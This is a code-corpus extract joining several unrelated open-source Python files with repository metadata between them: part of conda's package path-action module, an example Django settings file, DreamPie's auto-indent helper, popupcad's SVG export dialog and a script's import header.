# preferred_env = package_info.repodata_record.preferred_env
# if preferred_env_matches_prefix(preferred_env, target_prefix, context.root_prefix):
# exe_paths = (package_info.package_metadata
# and package_info.package_metadata.preferred_env
# and package_info.package_metadata.preferred_env.executable_paths
# or ())
#
# # target_prefix for the instantiated path action is the root prefix, not the same
# # as target_prefix for the larger transaction
# assert is_private_env_path(target_prefix)
# root_prefix = dirname(dirname(target_prefix))
#
# if on_win:
# def make_app_entry_point_axns(exe_path):
# assert exe_path.endswith(('.exe', '.bat'))
# target_short_path = exe_path[:-4] + "-script.py"
# yield cls(transaction_context, package_info, target_prefix, exe_path,
# root_prefix, target_short_path)
#
# yield CreateApplicationEntryPointWindowsExeAction.create_actions(
# transaction_context, package_info, root_prefix,
# LinkType.hardlink, exe_path[:-4] + ".exe"
# )
# return tuple(concat(make_app_entry_point_axns(executable_short_path)
# for executable_short_path in exe_paths))
#
# else:
# return tuple(
# cls(transaction_context, package_info, target_prefix, executable_short_path,
# root_prefix, executable_short_path)
# for executable_short_path in exe_paths
# )
# else:
# return ()
#
# def execute(self):
# log.trace("creating application entry point %s => %s",
# self.source_full_path, self.target_full_path)
# if self.source_prefix == context.conda_prefix:
# # this could blow up for the special case of application entry points in conda's
# # private environment
# # in that case, probably should use the python version from transaction_context
# conda_python_version = self.transaction_context['target_python_version']
# else:
# conda_python_version = get_python_version_for_prefix(context.conda_prefix)
# conda_python_short_path = get_python_short_path(conda_python_version)
# conda_python_full_path = join(context.conda_prefix, win_path_ok(conda_python_short_path))
# create_application_entry_point(self.source_full_path, self.target_full_path,
# conda_python_full_path)
# self._execute_successful = True
#
# @property
# def leased_path_type(self):
# return LeasedPathType.application_entry_point
#
#
# class CreateApplicationSoftlinkAction(CreateLeasedPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type): # NOQA
# preferred_env = package_info.repodata_record.preferred_env
# if preferred_env_matches_prefix(preferred_env, target_prefix, context.root_prefix):
# softlink_paths = (package_info.package_metadata
# and package_info.package_metadata.preferred_env
# and package_info.package_metadata.preferred_env.softlink_paths
# or ())
#
# # target_prefix for the instantiated path action is the root prefix, not the same
# # as target_prefix for the larger transaction
# assert is_private_env_path(target_prefix)
# root_prefix = dirname(dirname(target_prefix))
# softlink_supported_test_file = join(target_prefix, PREFIX_MAGIC_FILE)
#
# def make_softlink_exe_axn(softlink_short_path):
# if not on_win: # pragma: win no cover
# root_short_path = softlink_short_path
# softlink_method = 'softlink'
# else: # pragma: unix no cover
# windows_pathext = os.getenv('PATHEXT', '').lower().split(';')
# path_root, path_ext = splitext(softlink_short_path)
#
# if softlink_supported(softlink_supported_test_file, root_prefix):
# root_short_path = softlink_short_path
# softlink_method = 'softlink'
# elif path_ext.lower() in windows_pathext:
# root_short_path = splitext(softlink_short_path)[0] + '.bat'
# softlink_method = 'fake_exe_softlink'
# else:
# root_short_path = softlink_short_path
# softlink_method = 'softlink_or_fail_ok'
#
# return cls(transaction_context, package_info, target_prefix, softlink_short_path,
# root_prefix, root_short_path, softlink_method)
#
# return tuple(make_softlink_exe_axn(softlink_short_path)
# for softlink_short_path in softlink_paths)
#
# else:
# return ()
#
# def __init__(self, transaction_context, package_info, source_prefix, source_short_path,
# target_prefix, target_short_path, softlink_method):
# super(CreateApplicationSoftlinkAction, self).__init__(transaction_context, package_info,
# source_prefix, source_short_path,
# target_prefix, target_short_path)
# self.softlink_method = softlink_method
#
# def execute(self):
# log.trace("creating application softlink via %s %s => %s",
# self.softlink_method, self.source_full_path, self.target_full_path)
# getattr(self, self.softlink_method)()
# self._execute_successful = True
#
# def softlink(self):
# symlink(self.source_full_path, self.target_full_path)
# assert islink(self.target_full_path)
#
# def fake_exe_softlink(self): # pragma: unix no cover
# create_fake_executable_softlink(self.source_full_path, self.target_full_path)
#
# def softlink_or_fail_ok(self): # pragma: unix no cover
# try:
# symlink(self.source_full_path, self.target_full_path)
# except (IOError, OSError) as e:
# log.trace('%r', e)
#
# @property
# def leased_path_type(self):
# return LeasedPathType.application_softlink
class CreatePrefixRecordAction(CreateInPrefixPathAction):
# this is the action that creates a packages json file in the conda-meta/ directory
@classmethod
def create_actions(cls, transaction_context, package_info, target_prefix, requested_link_type,
requested_spec, all_link_path_actions):
extracted_package_dir = package_info.extracted_package_dir
target_short_path = 'conda-meta/%s.json' % basename(extracted_package_dir)
return cls(transaction_context, package_info, target_prefix, target_short_path,
requested_link_type, requested_spec, all_link_path_actions),
def __init__(self, transaction_context, package_info, target_prefix, target_short_path,
requested_link_type, requested_spec, all_link_path_actions):
super(CreatePrefixRecordAction, self).__init__(transaction_context, package_info,
None, None, target_prefix,
target_short_path)
self.requested_link_type = requested_link_type
self.requested_spec = requested_spec
self.all_link_path_actions = all_link_path_actions
def execute(self):
link = Link(
source=self.package_info.extracted_package_dir,
type=self.requested_link_type,
)
extracted_package_dir = self.package_info.extracted_package_dir
package_tarball_full_path = extracted_package_dir + CONDA_TARBALL_EXTENSION
# TODO: don't make above assumption; put package_tarball_full_path in package_info
files = (x.target_short_path for x in self.all_link_path_actions if x)
paths_data = PathsData(
paths_version=1,
paths=(x.prefix_path_data for x in self.all_link_path_actions
if x and x.prefix_path_data),
)
self.prefix_record = PrefixRecord.from_objects(
self.package_info.repodata_record,
self.package_info.index_json_record,
self.package_info.package_metadata,
requested_spec=text_type(self.requested_spec),
paths_data=paths_data,
files=files,
link=link,
url=self.package_info.url,
extracted_package_dir=extracted_package_dir,
package_tarball_full_path=package_tarball_full_path,
)
log.trace("creating linked package record %s", self.target_full_path)
PrefixData(self.target_prefix).insert(self.prefix_record)
def reverse(self):
log.trace("reversing linked package record creation %s", self.target_full_path)
# TODO: be careful about failure here, and being too strict
PrefixData(self.target_prefix).remove(self.package_info.index_json_record.name)
class UpdateHistoryAction(CreateInPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, target_prefix, remove_specs, update_specs):
target_short_path = join('conda-meta', 'history')
return cls(transaction_context, target_prefix, target_short_path,
remove_specs, update_specs),
def __init__(self, transaction_context, target_prefix, target_short_path, remove_specs,
update_specs):
super(UpdateHistoryAction, self).__init__(transaction_context, None, None, None,
target_prefix, target_short_path)
self.remove_specs = remove_specs
self.update_specs = update_specs
self.hold_path = self.target_full_path + '.c~'
def execute(self):
log.trace("updating environment history %s", self.target_full_path)
if lexists(self.target_full_path):
copy(self.target_full_path, self.hold_path)
h = History(self.target_prefix)
h.update()
h.write_specs(self.remove_specs, self.update_specs)
def reverse(self):
if lexists(self.hold_path):
log.trace("moving %s => %s", self.hold_path, self.target_full_path)
backoff_rename(self.hold_path, self.target_full_path, force=True)
def cleanup(self):
rm_rf(self.hold_path)
class RegisterEnvironmentLocationAction(PathAction):
def __init__(self, transaction_context, target_prefix):
self.transaction_context = transaction_context
self.target_prefix = target_prefix
self._execute_successful = False
def verify(self):
touch(USER_ENVIRONMENTS_TXT_FILE, mkdir=True, sudo_safe=True)
self._verified = True
def execute(self):
log.trace("registering environment in catalog %s", self.target_prefix)
register_env(self.target_prefix)
self._execute_successful = True
def reverse(self):
pass
def cleanup(self):
pass
@property
def target_full_path(self):
raise NotImplementedError()
# class RegisterPrivateEnvAction(EnvsDirectoryPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, package_info, target_prefix, requested_spec,
# leased_paths):
# preferred_env = package_info.repodata_record.preferred_env
# if preferred_env_matches_prefix(preferred_env, target_prefix, context.root_prefix):
# return cls(transaction_context, package_info, context.root_prefix, preferred_env,
# requested_spec, leased_paths),
# else:
# return ()
#
# def __init__(self, transaction_context, package_info, root_prefix, env_name, requested_spec,
# leased_paths):
# self.root_prefix = root_prefix
# self.env_name = ensure_pad(env_name)
# target_prefix = join(self.root_prefix, 'envs', self.env_name)
# super(RegisterPrivateEnvAction, self).__init__(transaction_context, target_prefix)
#
# self.package_name = package_info.index_json_record.name
# self.requested_spec = requested_spec
# self.leased_paths = leased_paths
#
# fn = basename(package_info.extracted_package_dir) + '.json'
# self.conda_meta_path = join(self.target_prefix, 'conda-meta', fn)
#
# def execute(self):
# log.trace("registering private env for %s", self.target_prefix)
#
# # touches env prefix entry in catalog.json
# # updates leased_paths
# from .envs_manager import EnvsDirectory
# ed = EnvsDirectory(self.envs_dir_path)
#
# self.envs_dir_state = ed._get_state()
#
# for leased_path_entry in self.leased_paths:
# ed.add_leased_path(leased_path_entry)
#
# ed.add_preferred_env_package(self.env_name, self.package_name, self.conda_meta_path,
# self.requested_spec)
# ed.write_to_disk()
# self._execute_successful = True
#
# def reverse(self):
# if self._execute_successful:
# log.trace("reversing environment unregistration in catalog for %s", self.target_prefix) # NOQA
# from .envs_manager import EnvsDirectory
# ed = EnvsDirectory(self.envs_dir_path)
# ed._set_state(self.envs_dir_state)
# ed.write_to_disk()
# ######################################################
# Removal of Paths within a Prefix
# ######################################################
@with_metaclass(ABCMeta)
class RemoveFromPrefixPathAction(PrefixPathAction):
def __init__(self, transaction_context, linked_package_data, target_prefix, target_short_path):
super(RemoveFromPrefixPathAction, self).__init__(transaction_context,
target_prefix, target_short_path)
self.linked_package_data = linked_package_data
def verify(self):
# inability to remove will trigger a rollback
# can't definitely know if path can be removed until it's attempted and failed
self._verified = True
class UnlinkPathAction(RemoveFromPrefixPathAction):
def __init__(self, transaction_context, linked_package_data, target_prefix, target_short_path,
link_type=LinkType.hardlink):
super(UnlinkPathAction, self).__init__(transaction_context, linked_package_data,
target_prefix, target_short_path)
conda_temp_extension = '.c~'
self.holding_short_path = self.target_short_path + conda_temp_extension
self.holding_full_path = self.target_full_path + conda_temp_extension
self.link_type = link_type
def execute(self):
if self.link_type != LinkType.directory:
log.trace("renaming %s => %s", self.target_short_path, self.holding_short_path)
backoff_rename(self.target_full_path, self.holding_full_path, force=True)
def reverse(self):
if self.link_type != LinkType.directory and lexists(self.holding_full_path):
log.trace("reversing rename %s => %s", self.holding_short_path, self.target_short_path)
backoff_rename(self.holding_full_path, self.target_full_path, force=True)
def cleanup(self):
if self.link_type == LinkType.directory:
try_rmdir_all_empty(self.target_full_path)
else:
rm_rf(self.holding_full_path)
class RemoveMenuAction(RemoveFromPrefixPathAction):
@classmethod
def create_actions(cls, transaction_context, linked_package_data, target_prefix):
if on_win:
MENU_RE = re.compile(r'^menu/.*\.json$', re.IGNORECASE)
return tuple(cls(transaction_context, linked_package_data, target_prefix, trgt)
for trgt in linked_package_data.files if bool(MENU_RE.match(trgt)))
else:
return ()
def __init__(self, transaction_context, linked_package_data,
target_prefix, target_short_path):
super(RemoveMenuAction, self).__init__(transaction_context, linked_package_data,
target_prefix, target_short_path)
def execute(self):
log.trace("removing menu for %s ", self.target_prefix)
make_menu(self.target_prefix, self.target_short_path, remove=True)
def reverse(self):
log.trace("re-creating menu for %s ", self.target_prefix)
make_menu(self.target_prefix, self.target_short_path, remove=False)
def cleanup(self):
pass
class RemoveLinkedPackageRecordAction(UnlinkPathAction):
def __init__(self, transaction_context, linked_package_data, target_prefix, target_short_path):
super(RemoveLinkedPackageRecordAction, self).__init__(transaction_context,
linked_package_data,
target_prefix, target_short_path)
def execute(self):
super(RemoveLinkedPackageRecordAction, self).execute()
PrefixData(self.target_prefix).remove(self.linked_package_data.name)
def reverse(self):
super(RemoveLinkedPackageRecordAction, self).reverse()
PrefixData(self.target_prefix)._load_single_record(self.target_full_path)
class UnregisterEnvironmentLocationAction(PathAction):
def __init__(self, transaction_context, target_prefix):
self.transaction_context = transaction_context
self.target_prefix = target_prefix
self._execute_successful = False
def verify(self):
self._verified = True
def execute(self):
log.trace("unregistering environment in catalog %s", self.target_prefix)
unregister_env(self.target_prefix)
self._execute_successful = True
def reverse(self):
pass
def cleanup(self):
pass
@property
def target_full_path(self):
raise NotImplementedError()
# class UnregisterPrivateEnvAction(EnvsDirectoryPathAction):
#
# @classmethod
# def create_actions(cls, transaction_context, linked_package_data, target_prefix):
# preferred_env = ensure_pad(linked_package_data.preferred_env)
# if preferred_env_matches_prefix(preferred_env, target_prefix, context.root_prefix):
# package_name = linked_package_data.name
#
# from .envs_manager import EnvsDirectory
# envs_directory_path = EnvsDirectory.get_envs_directory_for_prefix(target_prefix)
# ed = EnvsDirectory(envs_directory_path)
#
# ed.get_leased_path_entries_for_package(package_name)
#
# leased_path_entries = ed.get_leased_path_entries_for_package(package_name)
# leased_paths_to_remove = tuple(lpe._path for lpe in leased_path_entries)
# unlink_leased_path_actions = (UnlinkPathAction(transaction_context, None,
# context.root_prefix, lp)
# for lp in leased_paths_to_remove)
#
# unregister_private_env_actions = cls(transaction_context, context.root_prefix,
# package_name),
#
# return concatv(unlink_leased_path_actions, unregister_private_env_actions)
#
# else:
# return ()
#
# def __init__(self, transaction_context, root_prefix, package_name):
# super(UnregisterPrivateEnvAction, self).__init__(transaction_context, root_prefix)
# self.root_prefix = root_prefix
# self.package_name = package_name
#
# def execute(self):
# log.trace("unregistering private env for %s", self.package_name)
#
# from .envs_manager import EnvsDirectory
# ed = EnvsDirectory(self.envs_dir_path)
#
# self.envs_dir_state = ed._get_state()
#
# ed.remove_preferred_env_package(self.package_name)
#
# ed.write_to_disk()
# self._execute_successful = True
#
# def reverse(self):
# if self._execute_successful:
# log.trace("reversing environment unregistration in catalog for %s",
# self.target_prefix)
# from .envs_manager import EnvsDirectory
# ed = EnvsDirectory(self.envs_dir_path)
# ed._set_state(self.envs_dir_state)
# ed.write_to_disk()
# ######################################################
# Fetch / Extract Actions
# ######################################################
class CacheUrlAction(PathAction):
def __init__(self, url, target_pkgs_dir, target_package_basename,
md5sum=None, expected_size_in_bytes=None):
self.url = url
self.target_pkgs_dir = target_pkgs_dir
self.target_package_basename = target_package_basename
self.md5sum = md5sum
self.expected_size_in_bytes = expected_size_in_bytes
self.hold_path = self.target_full_path + '.c~'
def verify(self):
assert '::' not in self.url
self._verified = True
def execute(self, progress_update_callback=None):
# I hate inline imports, but I guess it's ok since we're importing from the conda.core
# The alternative is passing the PackageCache class to CacheUrlAction __init__
from .package_cache_data import PackageCacheData
target_package_cache = PackageCacheData(self.target_pkgs_dir)
log.trace("caching url %s => %s", self.url, self.target_full_path)
if lexists(self.hold_path):
rm_rf(self.hold_path)
if lexists(self.target_full_path):
if self.url.startswith('file:/') and self.url == path_to_url(self.target_full_path):
# the source and destination are the same file, so we're done
return
else:
backoff_rename(self.target_full_path, self.hold_path, force=True)
if self.url.startswith('file:/'):
source_path = unquote(url_to_path(self.url))
if dirname(source_path) in context.pkgs_dirs:
# if url points to another package cache, link to the writable cache
create_hard_link_or_copy(source_path, self.target_full_path)
source_package_cache = PackageCacheData(dirname(source_path))
# the package is already in a cache, so it came from a remote url somewhere;
# make sure that remote url is the most recent url in the
# writable cache urls.txt
origin_url = source_package_cache._urls_data.get_url(self.target_package_basename)
if origin_url and has_platform(origin_url, context.known_subdirs):
target_package_cache._urls_data.add_url(origin_url)
else:
# so our tarball source isn't a package cache, but that doesn't mean it's not
# in another package cache somewhere
# let's try to find the actual, remote source url by matching md5sums, and then
# record that url as the remote source url in urls.txt
# we do the search part of this operation before the create_link so that we
# don't md5sum-match the file created by 'create_link'
# there is no point in looking for the tarball in the cache that we are writing
# this file into because we have already removed the previous file if there was
# any. This also makes sure that we ignore the md5sum of a possible extracted
# directory that might exist in this cache because we are going to overwrite it
# anyway when we extract the tarball.
source_md5sum = compute_md5sum(source_path)
exclude_caches = self.target_pkgs_dir,
pc_entry = PackageCacheData.tarball_file_in_cache(source_path, source_md5sum,
exclude_caches=exclude_caches)
if pc_entry:
origin_url = target_package_cache._urls_data.get_url(
pc_entry.extracted_package_dir
)
else:
origin_url = None
# copy the tarball to the writable cache
create_link(source_path, self.target_full_path, link_type=LinkType.copy,
force=context.force)
if origin_url and has_platform(origin_url, context.known_subdirs):
target_package_cache._urls_data.add_url(origin_url)
else:
target_package_cache._urls_data.add_url(self.url)
else:
download(self.url, self.target_full_path, self.md5sum,
progress_update_callback=progress_update_callback)
target_package_cache._urls_data.add_url(self.url)
def reverse(self):
if lexists(self.hold_path):
log.trace("moving %s => %s", self.hold_path, self.target_full_path)
backoff_rename(self.hold_path, self.target_full_path, force=True)
def cleanup(self):
rm_rf(self.hold_path)
@property
def target_full_path(self):
return join(self.target_pkgs_dir, self.target_package_basename)
def __str__(self):
return 'CacheUrlAction<url=%r, target_full_path=%r>' % (self.url, self.target_full_path)
class ExtractPackageAction(PathAction):
def __init__(self, source_full_path, target_pkgs_dir, target_extracted_dirname,
record_or_spec, md5sum):
self.source_full_path = source_full_path
self.target_pkgs_dir = target_pkgs_dir
self.target_extracted_dirname = target_extracted_dirname
self.hold_path = self.target_full_path + '.c~'
self.record_or_spec = record_or_spec
self.md5sum = md5sum
def verify(self):
self._verified = True
def execute(self, progress_update_callback=None):
# I hate inline imports, but I guess it's ok since we're importing from the conda.core
# The alternative is passing the the classes to ExtractPackageAction __init__
from .package_cache_data import PackageCacheData
log.trace("extracting %s => %s", self.source_full_path, self.target_full_path)
if lexists(self.hold_path):
rm_rf(self.hold_path)
if lexists(self.target_full_path):
try:
backoff_rename(self.target_full_path, self.hold_path)
except (IOError, OSError) as e:
if e.errno == EXDEV:
# OSError(18, 'Invalid cross-device link')
# https://github.com/docker/docker/issues/25409
# ignore, but we won't be able to roll back
log.debug("Invalid cross-device link on rename %s => %s",
self.target_full_path, self.hold_path)
rm_rf(self.target_full_path)
else:
raise
extract_tarball(self.source_full_path, self.target_full_path,
progress_update_callback=progress_update_callback)
index_json_record = read_index_json(self.target_full_path)
if isinstance(self.record_or_spec, MatchSpec):
url = self.record_or_spec.get_raw_value('url')
assert url
channel = Channel(url) if has_platform(url, context.known_subdirs) else Channel(None)
fn = basename(url)
md5 = self.md5sum or compute_md5sum(self.source_full_path)
repodata_record = PackageRecord.from_objects(index_json_record, url=url,
channel=channel, fn=fn, md5=md5)
else:
repodata_record = PackageRecord.from_objects(self.record_or_spec, index_json_record)
repodata_record_path = join(self.target_full_path, 'info', 'repodata_record.json')
write_as_json_to_file(repodata_record_path, repodata_record)
target_package_cache = PackageCacheData(self.target_pkgs_dir)
package_cache_record = PackageCacheRecord.from_objects(
repodata_record,
package_tarball_full_path=self.source_full_path,
extracted_package_dir=self.target_full_path,
)
target_package_cache.insert(package_cache_record)
# dist = Dist(recorded_url) if recorded_url else Dist(path_to_url(self.source_full_path))
# package_cache_entry = PackageCacheRecord.make_legacy(self.target_pkgs_dir, dist)
# target_package_cache[package_cache_entry.dist] = package_cache_entry
def reverse(self):
rm_rf(self.target_full_path)
if lexists(self.hold_path):
log.trace("moving %s => %s", self.hold_path, self.target_full_path)
rm_rf(self.target_full_path)
backoff_rename(self.hold_path, self.target_full_path)
def cleanup(self):
rm_rf(self.hold_path)
@property
def target_full_path(self):
return join(self.target_pkgs_dir, self.target_extracted_dirname)
def __str__(self):
return ('ExtractPackageAction<source_full_path=%r, target_full_path=%r>'
% (self.source_full_path, self.target_full_path))
|
Microsoft/PTVS
|
Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/conda/core/path_actions.py
|
Python
|
apache-2.0
| 57,237
|
"""
Django settings for example project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Add ./BASE_DIR/../ to sys path so we can use panels
import sys
sys.path.append(os.path.dirname(BASE_DIR))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tw0%24r54@r=3bbu=!hx6!7c1y_1#oge2jhlg!5+mxl_=1l5^$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_pygments',
'turbolinks',
'vesper',
'crispy_forms',
'nested_admin',
'example.foundation',
'example.components',
'example.patterns',
'example.views',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'turbolinks.middleware.TurbolinksMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'example.urls'
WSGI_APPLICATION = 'example.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# NAVIGATION = {
# {
# 'title': 'Sales',
# 'icon': 'sales',
# 'link': '/admin/scm/',
# 'children': [
# {
# 'title': 'Order',
# 'icon': 'sales-order',
# 'link': '/admin/scm/order',
# },
# {
# 'title': 'Shipment',
# 'icon': 'sales-shipment',
# 'link': '/admin/scm/order',
# },
# ]
# },
# {
# 'title': 'Catalog',
# 'icon': 'catalog',
# 'link': '/admin/pim/',
# 'children': [
# {
# 'title': 'Categories',
# 'icon': 'catalog-categories',
# 'link': '/admin/pim/categories',
# },
# {
# 'title': 'Products',
# 'icon': 'catalog-products',
# 'link': 'admin/pim/products'
# }
# ]
# }
# }
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
THEME = 'default'
|
Merino/poc-cbb
|
tests/example/settings.py
|
Python
|
bsd-3-clause
| 3,313
|
# Copyright 2009 Noam Yorav-Raphael
#
# This file is part of DreamPie.
#
# DreamPie is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DreamPie is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DreamPie. If not, see <http://www.gnu.org/licenses/>.
__all__ = ['newline_and_indent']
from . import pyparse
from .common import get_text
def newline_and_indent(sourceview, INDENT_WIDTH):
"""
Get a sourceview. Add a newline and indent - what happens when the user
pressed Enter.
"""
# This is based on newline_and_indent_event(),
# from idlelib/EditorWindow.py
sb = sourceview.get_buffer()
sb.begin_user_action()
insert_mark = sb.get_insert()
insert = lambda: sb.get_iter_at_mark(insert_mark)
try:
sb.delete_selection(True, True)
line = get_text(sb, sb.get_iter_at_line(insert().get_line()), insert())
i, n = 0, len(line)
while i < n and line[i] in " \t":
i = i+1
if i == n:
# the cursor is in or at leading indentation in a continuation
# line; just copy the indentation
sb.insert_at_cursor('\n'+line)
sourceview.scroll_mark_onscreen(sb.get_insert())
return True
indent = line[:i]
# strip whitespace before insert point
i = 0
while line and line[-1] in " \t":
line = line[:-1]
i = i+1
if i:
sb.delete(sb.get_iter_at_line_offset(insert().get_line(),
len(line)),
insert())
# strip whitespace after insert point
it = insert(); it.forward_to_line_end()
after_insert = get_text(sb, insert(), it)
i = 0
while i < len(after_insert) and after_insert[i] in " \t":
i += 1
if i > 0:
it = insert(); it.forward_chars(i)
sb.delete(insert(), it)
# start new line
sb.insert_at_cursor('\n')
# scroll to see the beginning of the line
sourceview.scroll_mark_onscreen(sb.get_insert())
#self.scrolledwindow_sourceview.get_hadjustment().set_value(0)
# adjust indentation for continuations and block
# open/close first need to find the last stmt
y = pyparse.Parser(INDENT_WIDTH, INDENT_WIDTH)
y.set_str(get_text(sb, sb.get_start_iter(), insert()))
c = y.get_continuation_type()
if c != pyparse.C_NONE:
# The current stmt hasn't ended yet.
if c == pyparse.C_STRING_FIRST_LINE:
# after the first line of a string; do not indent at all
pass
elif c == pyparse.C_STRING_NEXT_LINES:
# inside a string which started before this line;
# just mimic the current indent
sb.insert_at_cursor(indent)
elif c == pyparse.C_BRACKET:
# line up with the first (if any) element of the
# last open bracket structure; else indent one
# level beyond the indent of the line with the
# last open bracket
sb.insert_at_cursor(' ' * y.compute_bracket_indent())
elif c == pyparse.C_BACKSLASH:
# if more than one line in this stmt already, just
# mimic the current indent; else if initial line
# has a start on an assignment stmt, indent to
# beyond leftmost =; else to beyond first chunk of
# non-whitespace on initial line
if y.get_num_lines_in_stmt() > 1:
sb.insert_at_cursor(indent)
else:
sb.insert_at_cursor(' ' * y.compute_backslash_indent())
else:
assert False, "bogus continuation type %r" % (c,)
return True
# This line starts a brand new stmt; indent relative to
# indentation of initial line of closest preceding
# interesting stmt.
indent = len(y.get_base_indent_string())
if y.is_block_opener():
indent = (indent // INDENT_WIDTH + 1) * INDENT_WIDTH
elif y.is_block_closer():
indent = max(((indent - 1) // INDENT_WIDTH) * INDENT_WIDTH, 0)
sb.insert_at_cursor(' ' * indent)
return True
finally:
sb.end_user_action()
|
uri-mog/dreampie
|
dreampielib/gui/newline_and_indent.py
|
Python
|
gpl-3.0
| 4,812
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
import qt.QtCore as qc
import qt.QtGui as qg
import qt.QtSvg as qs
import popupcad
from math import pi, sin, cos
import numpy
import os
import sys
from popupcad.filetypes.validators import StrictDoubleValidator
class OutputSelection(qg.QDialog):
def __init__(self):
super(OutputSelection, self).__init__()
self.Inkscape = qg.QRadioButton('Inkscape')
self.CorelDraw = qg.QRadioButton('CorelDraw')
# self.Center = qg.QCheckBox('Center')
# self.rotation = qg.QLineEdit()
# self.rotation.setAlignment(qc.Qt.AlignRight)
# self.rotation.setText(str(0))
# self.rotation.setValidator(StrictDoubleValidator(popupcad.gui_negative_infinity, popupcad.gui_positive_infinity, popupcad.gui_default_decimals, self.rotation))
# self.rotation = qg.QSpinBox()
button1 = qg.QPushButton('Ok')
button2 = qg.QPushButton('Cancel')
self.dirbox = qg.QLineEdit()
self.dirbox.setText(popupcad.exportdir)
self.dirbutton = qg.QPushButton('...')
layout0 = qg.QHBoxLayout()
layout0.addWidget(self.dirbox)
layout0.addWidget(self.dirbutton)
layout1 = qg.QHBoxLayout()
layout1.addWidget(self.Inkscape)
layout1.addWidget(self.CorelDraw)
layout2 = qg.QHBoxLayout()
layout2.addWidget(button1)
layout2.addWidget(button2)
# layout4 = qg.QHBoxLayout()
# layout4.addWidget(qg.QLabel('Rotation'))
# layout4.addWidget(self.rotation)
layout3 = qg.QVBoxLayout()
layout3.addLayout(layout0)
layout3.addLayout(layout1)
# layout3.addWidget(self.Center)
# layout3.addLayout(layout4)
layout3.addLayout(layout2)
self.dirbutton.clicked.connect(self.selectExport)
button1.clicked.connect(self.accept)
button2.clicked.connect(self.reject)
self.Inkscape.setChecked(True)
self.setLayout(layout3)
def acceptdata(self):
if self.Inkscape.isChecked():
return popupcad.inkscape_mm_conversion, self.dirbox.text()
elif self.CorelDraw.isChecked():
return popupcad.coreldraw_mm_conversion, self.dirbox.text()
else:
raise Exception
def selectExport(self):
directorypath = qg.QFileDialog.getExistingDirectory(self,"Select Directory",self.dirbox.text())
if directorypath!='':
directorypath = os.path.normpath(directorypath)
self.dirbox.setText(directorypath)
class SVGOutputSupport(object):
def screenShot(self):
win = OutputSelection()
accepted = win.exec_()
if accepted:
time = popupcad.basic_functions.return_formatted_time()
self.renderprocess('2D_screenshot_' + time +'.svg',*win.acceptdata())
def renderprocess(self,basename,scaling,exportdir):
tempmodes = []
for item in self.items():
try:
tempmodes.append(item.mode)
except AttributeError:
tempmodes.append(None)
selected = self.selectedItems()
tempbrush = self.backgroundBrush()
# prerender
self.setBackgroundBrush(qg.QBrush())
for item in self.items():
try:
item.updatemode(item.modes.mode_render)
except AttributeError:
pass
pen = item.pen()
pen.setWidth(pen.width() / scaling)
item.setPen(pen)
item.setSelected(False)
filename = os.path.normpath(os.path.join(exportdir, basename))
self.setSceneRect(self.itemsBoundingRect())
generator = qs.QSvgGenerator()
generator.setFileName(filename)
generator.setSize(qc.QSize(self.width(), self.height()))
generator.setResolution(90.0 / scaling)
generator.setTitle('SVG Generator Example Drawing')
generator.setDescription('An SVG drawing created by the SVG Generator')
painter = qg.QPainter()
painter.begin(generator)
painter.setWorldMatrixEnabled(True)
t = qg.QTransform()
if popupcad.flip_y:
t.scale(1, -1)
s = scaling
t.scale(s, s)
t.translate(0, -self.height())
# if center:
# v1 = numpy.array([-self.width() / 2, -self.height() / 2])
# theta = -rotation * pi / 180
# R = numpy.array(
# [[cos(theta), sin(theta)], [-sin(theta), cos(theta)]])
# v2 = R.dot(v1)
# t.translate(*v2)
# t.rotate(rotation)
painter.setWorldTransform(t)
self.render(painter)
painter.end()
for item in selected:
item.setSelected(True)
for item, mode in zip(self.items(), tempmodes):
pen = item.pen()
pen.setWidth(pen.width() * scaling)
item.setPen(pen)
try:
item.updatemode(mode)
except AttributeError:
pass
self.setBackgroundBrush(tempbrush)
self.update()
if __name__ == '__main__':
app = qg.QApplication(sys.argv)
win = OutputSelection()
win.exec_()
sys.exit(app.exec_())
|
danaukes/popupcad
|
popupcad/graphics2d/svg_support.py
|
Python
|
mit
| 5,326
|
#!/usr/bin/env python3
import os
import sys
import random
import time
from random import seed, randint
import argparse
import platform
from datetime import datetime
import imp
import glob
from time import sleep
import fileinput
import numpy as np
from small_script.variable_test import variable_test
import subprocess
